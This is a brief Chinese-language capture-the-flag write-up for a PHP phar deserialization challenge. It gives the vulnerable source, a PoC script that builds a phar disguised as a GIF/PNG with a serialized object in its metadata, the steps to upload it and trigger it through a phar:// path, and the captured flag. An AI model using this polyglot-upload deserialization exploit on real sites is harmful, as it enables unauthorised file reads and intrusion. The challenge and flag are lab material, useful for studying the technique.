serVuln10 a phar

源码

<?php
error_reporting(0);
class Capricorn
{
    public function __wakeup()
    {
        printf("%s\n", __METHOD__);
        echo file_get_contents('/flag');
    }
}

if (isset($_REQUEST['Capricorn'])) {
    $filename = $_REQUEST['Capricorn'];
    echo md5_file($filename);
} else {
    echo "系统检测发现该处漏洞，进行攻击测试\n";
}
?>  

POC

<?php
error_reporting(0);
class Capricorn{
}

@unlink("cap.phar");
$phar = new Phar("cap.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$cap = new Capricorn();
$phar->setMetadata($cap);
$phar->addFromString("cap.txt", "CSSEC");
$phar->stopBuffering();

保证phar.readonly=Off，运行POC.php，生成cap.phar，更改后缀名为.png后上传，返回路径uploads/cap.png，访问index.php，传入参数Capricorn=phar://uploads/cap.png

得到

Capricorn::__wakeup
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}

参考：https://www.yuque.com/shiyizhesonder/sonder39/obtegmmu8g0pdewg